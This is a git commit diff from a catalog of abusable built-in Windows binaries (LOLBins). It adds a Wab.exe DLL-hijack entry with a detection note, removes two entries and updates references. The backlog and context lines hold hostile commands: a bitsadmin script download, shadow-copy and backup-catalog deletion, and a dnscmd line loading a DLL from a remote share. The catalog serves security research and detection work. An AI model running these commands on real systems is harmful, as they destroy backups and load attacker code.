Cleaning and adding Wab.exe

2018-05-09 15:25:30 +02:00 · 2018-05-09 15:25:30 +02:00 · 118c337dfb
parent 8b1e87b251
commit 118c337dfb
7 changed files with 50 additions and 67 deletions
--- a/Backlog.txt
+++ b/Backlog.txt
@ -3,7 +3,6 @@ Kd.exe			Debugger
 Certreq.exe		Exfiltrate data
 Dbghost.exe
 Robocopy.exe	Needs examples
-Bitsadmin.exe	bitsadmin.exe  /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
 Vssadmin.exe	vssadmin.exe Delete Shadows /All /Quiet
 notepad.exe		Gui - Download files using Open (A lot of other programs as well) LOLGuiBins?
 wbadmin.exe 	wbadmin delete catalog -quiet
@ -15,3 +14,5 @@ WseClientSvc.exe	- https://blog.huntresslabs.com/abusing-trusted-applications-a7
 dvdplay.exe		http://www.hexacorn.com/blog/2018/03/15/beyond-good-ol-run-key-part-73/
 http://www.hexacorn.com/blog/category/living-off-the-land/pass-thru-command-execution/
 https://twitter.com/Hexacorn/status/993498264497541120
+https://twitter.com/Hexacorn/status/994000792628719618
+https://github.com/MoooKitty/Code-Execution
--- a/LOLBins.md
+++ b/LOLBins.md
@ -46,12 +46,10 @@ If you are missing from the acknowledgement, please let me know (I did not forge
 [Presentationhost.exe](OSBinaries/Presentationhost.md)     
 [Print.exe](OSBinaries/Print.md)  
 [Psr.exe](OSBinaries/Psr.md)  
-[Qprocess.exe](OSBinaries/Qprocess.md)     
 [Reg.exe](OSBinaries/Reg.md)    
 [Regedit.exe](OSBinaries/Regedit.md)    
 [Regasm.exe](OSBinaries/Regasm.md)    
 [Register-cimprovider.exe](OSBinaries/Register-cimprovider.md)        
-[Regini.exe](OSBinaries/Regini.md)    
 [Regsvcs.exe](OSBinaries/Regsvcs.md)    
 [Regsvr32.exe](OSBinaries/Regsvr32.md)    
 [Replace.exe](OSBinaries/Replace.md)     
@ -63,6 +61,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
 [Sc.exe](OSBinaries/Sc.md)     
 [Scriptrunner.exe](OSBinaries/Scriptrunner.md)     
 [Syncappvpublishingserver.exe](OSBinaries/Syncappvpublishingserver.md)     
+[Wab.exe](OSBinaries/Wab.md)     
 [Wmic.exe](OSBinaries/Wmic.md)     
 [Wscript.exe](OSBinaries/Wscript.md)    
 [Xwizard.exe](OSBinaries/Xwizard.md)     
--- a/OSBinaries/Dnscmd.md
+++ b/OSBinaries/Dnscmd.md
@ -7,15 +7,19 @@ dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
 ```

 Acknowledgements:
-* Dimitrios Slamaris - @dim0x69
+* Shay Ber - ?   
+* Dimitrios Slamaris - @dim0x69    
+* Nikhil SamratAshok Mittal - @nikhil_mitt   

 Code sample:
 * 

 Resources:
+* https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
 * https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
 * https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
 * https://twitter.com/Hexacorn/status/994000792628719618
+* http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html

 Full path:
 ```
--- a/OSBinaries/Qprocess.md
+++ b/OSBinaries/Qprocess.md
@ -1,31 +0,0 @@
-## Qprocess.exe
-
-* Functions: Credentials
-
-```
-qprocess /SERVER:RemoteServer
-```
-
-Acknowledgements:
-* Rahmat Nurfauzi - @infosecn1nja    
-
-Code sample:
-*    
-
-Resources:
-* https://twitter.com/infosecn1nja/status/987268926139592706
-
-Full path:
-```
-c:\windows\system32\Qprocess.exe
-```
-
-Notes:
-Some specific details about the binary file.
-
-
-Detection:
-Details about detection.
-IOC, Behaviour , User Agents etc
-
- 
--- a/OSBinaries/Regini.md
+++ b/OSBinaries/Regini.md
@ -1,30 +0,0 @@
-## Regini.exe
-
-* Functions: Credentials
-
-```
-regini -m \\RemoteServer Example
-```
-
-Acknowledgements:
-* Osanda Malith - @OsandaMalith
-
-Code sample:
-* 
-
-Resources:
-* https://twitter.com/OsandaMalith/status/987823644402372608    
-* https://ss64.com/nt/regini.html    
-
-Full path:
-```
-c:\windows\system32\regini.exe
-c:\windows\sysWOW64\regini.exe
-```
-
-Notes:
-Can also be used to add registry keys
-
-Detection:
-
- 
--- a/OSBinaries/Wab.md
+++ b/OSBinaries/Wab.md
@ -0,0 +1,38 @@
+## Wab.exe
+
+* Functions: Execute
+
+```
+Wab.exe (requires registry changes)
+```
+
+Acknowledgements:
+* Adam - @Hexacorn
+
+Code sample:
+* 
+
+Resources:
+* http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
+* https://twitter.com/Hexacorn/status/991447379864932352
+
+Full path:
+```
+C:\Program Files\Windows Mail\wab.exe    
+C:\Program Files (x86)\Windows Mail\wab.exe    
+```
+
+Notes:
+Searches for wab.dll. Can be manipulated with the following registry key:
+```
+HKLM\Software\Microsoft\WAB\DLLPath
+```
+
+Binary is used to manage Windows contacts/wab files. (Legacy)
+
+
+Detection:
+Look for registry changes to HKLM\Software\Microsoft\WAB\DLLPath
+
+
+ 
--- a/OtherMSBinaries/Sqldumper.md
+++ b/OtherMSBinaries/Sqldumper.md
@ -21,11 +21,13 @@ Resources:

 Full path:
 ```
-C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
+C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe   
+
+C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe   
 ```

 Notes:
-
+Part of SQL server, but also Office in some versions.